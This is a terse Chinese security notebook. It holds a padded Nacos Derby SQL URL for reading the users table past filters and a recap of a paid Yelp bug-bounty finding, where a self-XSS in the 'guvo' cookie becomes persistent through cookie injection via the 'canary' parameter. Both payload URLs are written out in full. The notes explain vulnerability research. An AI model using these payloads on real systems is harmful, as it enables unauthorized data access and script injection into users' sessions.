随手记
http://localhost:8848/nacos/v1/cs/ops/derby?&sql=**SELECT%20*FROM%20users**/nacos/v1/cs/ops/derby?sql=**SELECT**--/dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad&sql=/%0a*--/%25&q=dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad%&sql=%0a**from**--/&sql=/%0a**users**admin/country-dashboard 绕过鉴权四、如何变废为宝利用self-XSS组合漏洞赚取了6000美金
cookie 中存在 guvo 参数,插入 XSS payload,发包后 payload 会输出在返回包中,未做任何编码转义(显然这只是个 self-xss,后面结合 yelp.com 存在的一个特性进一步提升危害。)
如果在请求 url 中增加一个参数 ?canary=asdf,响应头中将返回:
Set-Cookie: yelpmainpaastacanary=**asdf**; Domain=.yelp.com; Path=/; Secure; SameSite=Lax
Yelp 后端处理 cookie 时,通过用空格而不是分号来分割 cookie;而浏览器一般是用分号,那么就可以构造 url 如:
<https://www.yelp.com/?canary=asdf> guvo=</script><script>alert(1)</script>
普通用户访问攻击者构造的 url 后,payload 就存储在该用户 cookie guvo 参数中,每次访问 www.yelp.com 时就会触发 XSS 漏洞。